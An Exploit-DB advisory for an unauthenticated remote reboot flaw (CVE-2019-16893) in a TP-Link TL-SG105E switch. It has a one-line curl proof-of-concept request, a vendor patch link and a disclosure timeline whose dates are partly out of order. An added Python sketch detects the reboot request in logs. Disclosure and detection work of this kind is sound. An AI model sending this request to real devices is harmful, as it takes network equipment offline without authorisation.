TP-Link TP-SG105E 1.0.0 – Unauthenticated Remote Reboot

  • Author: PCEumel
    Date: 2020-01-24
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47958/
  • # Exploit Title: TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot
    # Date: 2020-01-20
    # Exploit Author: PCEumel
    # Vendor Homepage: https://www.tp-link.com/
    # Software Link: https://www.tp-link.com/us/support/download/tl-sg105e/#Firmware
    # Version: TP-Link TP-SG105E V4
    # Tested on: TP-SG105E V4 1.0.0 Build 20181120
    # Patch from vendor : https://static.tp-link.com/2020/202001/20200120/TL-SG105Ev4.0_en_1.0.0_[20200119-rel.52079]_up.zip
    # CVE : CVE-2019-16893
    
    # TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot
    # The TP-Link TP-SG105E is a "5-Port Gigabit Easy Smart Switch".
    # It features a web front end and an application (Easy Smart Configuration Utility)
    # for easy configuration management.
    
    # The device does not properly restrict access to an internal API.
    # It is therefore possible to remotely reboot the device by sending an HTTP POST
    # request.
    
    ---
    
    # POC :
    curl -d "reboot_op=reboot" -X POST http://192.168.1.10/reboot.cgi
    
    ---
    
    Timeline :
    2019-09-16 | Vendor notified 
    2019-09-25 | Reply (they will patch it)
    2019-12-24 | First patch for testing
    2019-12-19 | Confirmed the functionality of the patch
    2020-01-14 | Public patch available
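
Added example (not part of the original advisory or the author's PoC): because the reboot endpoint needs no authentication, one way to spot abuse on unpatched units is to flag every POST to /reboot.cgi seen on the wire and mark those that do not come from the admin subnet. The Zeek-style JSON field names, the switch inventory, the management subnet and the log records are all assumptions constructed for this sketch.

```python
import ipaddress
import json

# Assumptions for this example: which hosts are switches, where admins sit.
SWITCHES = {"192.168.1.10"}
MGMT_NET = ipaddress.ip_network("192.168.1.192/28")
REBOOT_PATH = "/reboot.cgi"  # endpoint named in the advisory

# Constructed sample records (not real traffic), one JSON object per line.
SAMPLE_LOG = """\
{"ts": 1579500000.0, "id.orig_h": "192.168.1.200", "id.resp_h": "192.168.1.10", "method": "POST", "uri": "/reboot.cgi"}
{"ts": 1579500060.0, "id.orig_h": "192.168.1.57", "id.resp_h": "192.168.1.10", "method": "POST", "uri": "/reboot.cgi"}
{"ts": 1579500075.0, "id.orig_h": "192.168.1.57", "id.resp_h": "192.168.1.10", "method": "GET", "uri": "/"}
{"ts": 1579500090.0, "id.orig_h": "192.168.1.57", "id.resp_h": "192.168.1.10", "method": "post", "uri": "/reboot.cgi?x=1"}
not json
{"ts": 1579500120.0, "id.orig_h": "192.168.1.57", "id.resp_h": "192.168.1.20", "method": "POST", "uri": "/reboot.cgi"}
"""

def find_reboot_requests(lines):
    """Return one alert per POST to the reboot endpoint on a known switch."""
    alerts = []
    for line in lines:
        try:
            rec = json.loads(line)
            src = ipaddress.ip_address(rec["id.orig_h"])
            dst = rec["id.resp_h"]
            method = str(rec["method"]).upper()
            path = str(rec["uri"]).split("?", 1)[0]  # ignore any query string
        except (ValueError, KeyError, TypeError):
            continue  # malformed or incomplete record: skip it
        if dst in SWITCHES and method == "POST" and path == REBOOT_PATH:
            alerts.append({"ts": rec.get("ts"), "src": str(src), "dst": dst,
                           "from_mgmt": src in MGMT_NET})
    return alerts

def suspicious(alerts):
    """Reboot requests that did not originate from the management subnet."""
    return [a for a in alerts if not a["from_mgmt"]]

if __name__ == "__main__":
    for alert in find_reboot_requests(SAMPLE_LOG.splitlines()):
        tag = "admin" if alert["from_mgmt"] else "SUSPICIOUS"
        print(f'{alert["ts"]} {alert["src"]} -> {alert["dst"]} reboot [{tag}]')
```

Until the vendor firmware is installed, restricting which hosts can reach the switch's web interface at all removes the need to rely on this alert alone.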